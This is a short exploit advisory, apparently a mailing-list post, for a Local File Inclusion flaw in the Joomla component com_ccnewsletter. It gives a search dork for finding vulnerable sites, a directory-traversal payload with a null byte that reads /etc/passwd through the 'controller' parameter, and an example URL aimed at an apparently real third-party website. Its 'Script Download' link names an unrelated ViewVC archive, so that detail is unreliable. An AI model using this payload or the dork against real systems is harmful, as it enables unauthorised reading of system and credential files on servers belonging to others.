Joomla Component com_ccnewsletter Local File Inclusion
==========================================================

###########################################
.:. Author         : AtT4CKxT3rR0r1ST

.:. Email          : F.Hack@w.cn

.:. Home           : www.sec-attack.com/vb

.:. Script         : Joomla Component com_ccnewsletter

.:. Script Download: http://www.viewvc.org/nightly/viewvc-1.2-dev-20100128.zip

.:. Bug Type       : Local File Inclusion [LFI]

.:. Dork           : inurl:"com_ccnewsletter"

.:. Date           : 28/1/2010

#############################################

===[ Exploit ]===

www.site.com/index.php?option=com_ccnewsletter&controller=[LFI]

www.site.com/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00

===[ Example ]===

http://www.video-hit.ru/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00

#############################################

Greats T0: My Mind & All member Sec Attack


________________________________
Hotmail: Powerful Free email with security by Microsoft. Get it now.<https://signup.live.com/signup.aspx?id=60969>